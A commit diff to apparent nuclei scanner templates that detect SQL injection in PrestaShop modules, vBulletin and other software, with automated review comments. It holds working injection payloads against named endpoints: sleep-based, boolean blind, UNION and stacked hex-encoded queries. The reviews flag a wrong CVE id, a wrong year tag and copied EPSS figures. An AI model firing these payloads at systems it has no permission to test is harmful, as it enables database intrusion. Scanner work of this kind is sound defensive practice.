Optimized some templates due to a nuclei change and added new templates

patch-12
mastercho 2024-07-14 19:15:12 +03:00
parent af2f5ade84
commit 425e6e7c99
17 changed files with 240 additions and 29 deletions


@ -48,6 +48,7 @@ http:
{{randstr}}
--a54906fe12c504cb01ca836d062f82fa--
host-redirects: true
matchers:
- type: dsl
dsl:
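Review bot: `host-redirects: true` is added on the `host-redirects` line of this hunk with no `max-redirects` cap, whereas the hunks in this commit touching `/module/pireospay/validation`, `search_query=`, `/upload/`, `/arcade.php`, `/ajax.php?do=inforum` and `contenttypeid=7` pair it with `max-redirects: 3`. The uncapped form recurs in the forumrunner, `product_frontend_action/synchronize` and `leocustomajax` hunks and in the request blocks of the new xipblog, tvcmsblog and productsalert templates. Unless the engine default is intended, add `max-redirects: 3` directly after `host-redirects: true` in each of them so every template bounds the redirect chain the same way. The request block this hunk belongs to starts outside the hunk.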


@ -43,7 +43,7 @@ http:
- "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
stop-at-first-match: true
host-redirects: true
matchers-condition: and
matchers:
- type: word


@ -24,11 +24,11 @@ http:
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 12s
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
host-redirects: true
matchers-condition: or
matchers:
- type: dsl


@ -34,9 +34,7 @@ info:
http:
- raw:
- |
GET /modules/appagebuilder/config.xml HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 12s
POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
@ -60,28 +58,22 @@ http:
X-Requested-With: XMLHttpRequest
leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI
extractors:
- type: regex
name: version
part: body_1
internal: true
group: 1
regex:
- "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
name: time-based
dsl:
- 'duration_2>=6'
- 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
- 'duration_1>=6'
- 'status_code_1 == 200 && contains(base64(body_1), "eyJwcm9kdWN0X29uZV9pbWciOltdfQ==")'
condition: and
- type: dsl
name: blind-based
dsl:
- 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
- 'contains(body_3, "content") && contains(body_3, "{{Hostname}}")'
- '!contains(body_4, "content") && !contains(body_4, "{{Hostname}}")'
- 'len(body_3) > 200 && len(body_4) <= 22'
- 'status_code_1 == 200 && contains(base64(body_1), "eyJwcm9kdWN0X29uZV9pbWciOltdfQ==")'
- 'contains(body_2, "content") && contains(body_2, "{{Hostname}}")'
- '!contains(body_3, "content") && !contains(body_3, "{{Hostname}}")'
- 'len(body_2) > 200 && len(body_3) <= 22'
condition: and
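Review bot: The base64 literal `eyJwcm9kdWN0X29uZV9pbWciOltdfQ==` used by both the time-based and blind-based matchers is opaque to a reader; add a comment above `matchers:` such as `# eyJwcm9kdWN0X29uZV9pbWciOltdfQ== is base64 of {"product_one_img":[]}` so the expected body can be checked without decoding. Dropping the `version` extractor also removes the `compare_versions(version, "<= 2.4.4")` gate, so the time-based matcher now rests on `duration_1>=6` plus that body; if that is deliberate, a one-line comment saying the version check was dropped on purpose would help, since a slow host serving the same empty list would presumably match. The request list this hunk modifies starts outside the hunk.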


@ -67,16 +67,16 @@ http:
submitComment=
------------YWJkMTQzNDcw--
- |
GET /modules/jmsblog/config.xml HTTP/1.1
GET / HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration_1>=6'
- 'contains(body_2, "Jms Blog")'
- 'contains(body_2, "jmsblog")'
condition: and
# digest: 4a0a00473045022100b9f9b8cc6b64a6d4a7f59d009c1b93c8e00bf31220947f1984254c5ffda4601c022017fb76e27e4d3550f19969a20b834066f6ed8bca4aa11e7fbde5f3b6122e0068:922c64590222798bb761d5b6d8e72950
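Review bot: The `# digest:` trailer on the last line of this hunk is unchanged although the request (`GET / HTTP/1.1`) and the matcher string (`"jmsblog"`) above it changed, so the signature presumably no longer verifies against the template body; the apmarketplace hunk keeps its digest line the same way while its POST body and DSL changed. Either drop the digest lines in this fork or regenerate them (nuclei's `-sign` option) once the templates are final. The raw request list starts outside the hunk.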


@ -0,0 +1,83 @@
id: CVE-2023-27847
info:
name: PrestaShop xipblog SQL Injection
author: mastercho
severity: critical
description: |
In the blog module (xipblog), an anonymous user can perform SQL injection. Even though the module has been patched in version 2.0.1, the version number was not incremented at the time.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27847
- https://security.friendsofpresta.org/modules/2023/03/23/xipblog.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27847
cwe-id: CWE-89
epss-score: 0.04685
epss-percentile: 0.91818
metadata:
redirects: true
max-redirects: 3
framework: prestashop
shodan-query: http.component:"Prestashop"
tags: cve,cve2023,prestashop,sqli,unauth,xipblog
http:
- raw:
- |
@timeout: 20s
GET / HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(5)))AuDU)--+lafl HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5484--+xhCs HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5485--+xhCs HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562),NULL,NULL--+- HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
stop-at-first-match: true
host-redirects: true
matchers:
- type: dsl
name: time-based
dsl:
- 'duration_2>=5'
- 'status_code_1 == 200 && contains(body_1, "xipblog")'
condition: and
- type: dsl
name: blind-based
dsl:
- 'status_code_1 == 200 && contains(body_1, "xipblog")'
- 'contains(body_3, "kr_blog_post_area")'
- '!contains(body_4, "kr_blog_post_area")'
condition: and
- type: dsl
name: union-based
dsl:
- 'status_code_1 == 200 && contains(body_1, "xipblog")'
- 'contains(body_5, "c8c605999f3d8352d7bb792cf3fdb25b")'
condition: and
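Review bot: `redirects: true` and `max-redirects: 3` are placed under `metadata:`, which as far as I can tell nuclei reads as free-form template info rather than request options, while the request block sets only `host-redirects: true`; move `max-redirects: 3` beside `host-redirects: true` in the request block and drop the two metadata keys (the new tvcmsblog and productsalert templates have the same layout). The `impact` text has `unauthorized accessand data leakage`, missing a space, and the same sentence is repeated in the other two new templates. The `epss-score: 0.04685` / `epss-percentile: 0.91818` pair is byte-identical across all three new templates, which looks copied rather than looked up per CVE; verify each pair.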


@ -38,9 +38,11 @@ http:
GET / HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 12s
GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:


@ -0,0 +1,62 @@
id: CVE-2023-39650
info:
name: PrestaShop Theme Volty CMS Blog SQL Injection
author: mastercho
severity: critical
description: |
In the module “Theme Volty CMS Blog” (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39650
- https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27847
cwe-id: CWE-89
epss-score: 0.04685
epss-percentile: 0.91818
metadata:
redirects: true
max-redirects: 3
framework: prestashop
shodan-query: http.component:"Prestashop"
tags: cve,cve2023,prestashop,sqli,unauth,tvcmsblog
http:
- raw:
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(5)))oqFL)--+yxoW HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
host-redirects: true
matchers:
- type: dsl
name: time-based
dsl:
- 'duration_1>=5'
- 'status_code_1 == 200 && contains(body_1, "tvcmsblog")'
condition: and
- type: dsl
name: blind-based
dsl:
- 'status_code_2 == 200 && contains(body_2, "tvcmsblog")'
- 'status_code_2 == 200 && status_code_3 == 302'
condition: and
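Review bot: `cve-id: CVE-2023-27847` under `classification:` contradicts `id: CVE-2023-39650` and the references above it, an apparent copy-paste from the xipblog template; change it to `cve-id: CVE-2023-39650`. The blind-based matcher also requires `status_code_3 == 302` while `host-redirects: true` asks the engine to follow same-host redirects, so if the false-condition request redirects within the host, `status_code_3` would presumably be the post-redirect status and the matcher could never fire; either leave redirects off in this template or match the redirect response directly.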


@ -16,12 +16,15 @@ info:
http:
- raw:
- |
@timeout: 12s
POST /module/pireospay/validation HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: dsl


@ -36,6 +36,8 @@ http:
search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:


@ -0,0 +1,53 @@
id: CVE-2024-36683
info:
name: PrestaShop productsalert SQL Injection
author: mastercho
severity: critical
description: |
In the module “Products Alert” (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36683
- https://security.friendsofpresta.org/modules/2024/06/20/productsalert.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-36683
cwe-id: CWE-89
epss-score: 0.04685
epss-percentile: 0.91818
metadata:
redirects: true
max-redirects: 3
framework: prestashop
shodan-query: http.component:"Prestashop"
tags: cve,cve2023,prestashop,sqli,unauth,productsalert
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
POST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158
stop-at-first-match: true
host-redirects: true
matchers:
- type: dsl
name: time-based
dsl:
- 'duration_2>=5'
- 'status_code_1 == 200 && contains(body_1, "modules/productsalert")'
condition: and
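Review bot: `tags: cve,cve2023,...` carries the wrong year for a CVE-2024 id; change it to `tags: cve,cve2024,prestashop,sqli,unauth,productsalert`. `stop-at-first-match: true` is set although the template has a single matcher, so it has no effect and can be dropped. Like the other two new templates, `max-redirects: 3` sits under `metadata:` instead of beside `host-redirects: true` in the request block, and the `epss-score` / `epss-percentile` values are identical to theirs; verify them for this CVE.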


@ -28,6 +28,8 @@ http:
- type: word
words:
- "<title>OpenBullet2</title>"
- "<title>Openbullet2WebClient</title>"
condition: or
- type: status
status:


@ -10,26 +10,28 @@ info:
- https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/#pll_switcher
metadata:
verified: true
max-request: 1
shodan-query: http.component:"Prestashop"
tags: prestashop,sqli
http:
- raw:
- |
@timeout: 12s
POST /m/apmarketplace/passwordrecovery HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
X-Requested-With: XMLHttpRequest
email=" AND (SELECT 3472 FROM (SELECT(SLEEP(6)))UTQK)-- IGIe&submit_reset_pwd=
email="+AND+(SELECT+3472+FROM+(SELECT(SLEEP(6)))UTQK)--+IGIe&submit_reset_pwd=
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'duration_2>=6'
- 'contains(body, "module-apmarketplace-passwordrecovery")'
- 'duration_1>=6'
- 'contains(body_1, "module-apmarketplace-passwordrecovery")'
condition: and
# digest: 4b0a00483046022100b48440bd6c3340453db529a4aa26ebfc2720ca154ed673b86253139e316d9fa3022100c353a472d66ba11b085155b28ee58f92dce4988e04ba847f68aefa70fd759a4d:922c64590222798bb761d5b6d8e72950


@ -57,6 +57,8 @@ http:
GET /upload/{(unknown)}.html HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word


@ -19,6 +19,8 @@ http:
path:
- "{{BaseURL}}/arcade.php?act=Arcade&do=stats&comment=a&s_id=1'"
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word


@ -21,12 +21,15 @@ info:
http:
- raw:
- |
@timeout: 12s
POST /ajax.php?do=inforum&listforumid=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&result=10 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
undefined&s=&securitytoken=guest
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:


@ -23,6 +23,8 @@ http:
contenttypeid=7&do=process&humanverify=1&cat[]=-1%27
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word